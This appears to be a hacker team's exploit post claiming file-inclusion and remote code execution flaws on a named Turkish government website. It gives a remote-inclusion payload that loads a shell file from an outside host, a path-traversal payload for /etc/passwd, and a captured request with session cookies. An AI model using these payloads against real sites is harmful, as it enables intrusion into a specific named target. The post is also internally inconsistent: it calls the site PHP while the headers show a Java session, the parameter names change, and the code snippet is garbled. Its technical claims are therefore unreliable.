Vulnerability Author : Gaddar
Team : SiyahBayrak
TeamMates : Deadly-Warrior ~ StabilBey ~ Diablo
Vendor HomePage : tcmb.gov.tr
Vuln. URL : https://evds2.tcmb.gov.tr/index.php?/evds/serieMarket

Description;
Thanks to this vulnerability, remote code and files can be executed. Legal data of the site is stored. The source of the site includes php and lfi/rfi.

Payload : index.php?sayfa=
Example : index.php?sayfa=https://target.com/shell.txt

Remote Codes;
index.php
<?php
include ('data/$home/.../index.php');
?>

Payload URL : index.php?data=../../../etc/passwd

PREVIEW;
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: BIGipServerEVDS2_HTTPS_POOL=1913432256.47873.0000; JSESSIONID=C7CA3B3E8343A73D36E9E01A25A7EF92; TS013c5758=015d31d691e014116d0f047d3655d2145c0949f6d903ddb8f7d3cba23d3804da926581ee0c2deb034ed073ab3b5fe39632f1879f7c295ca0b2040dcbf0c2bdccddb4e086d9a3bd63aa0aa6e3c227bca89adcfa9a7f
Host: evds2.tcmb.gov.tr
If-Modified-Since: Fri, 17 Jan 2020 13:02:06 GMT
If-None-Match: W/"105932-1579266126000"
Referer: https://evds2.tcmb.gov.tr/index.php?
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36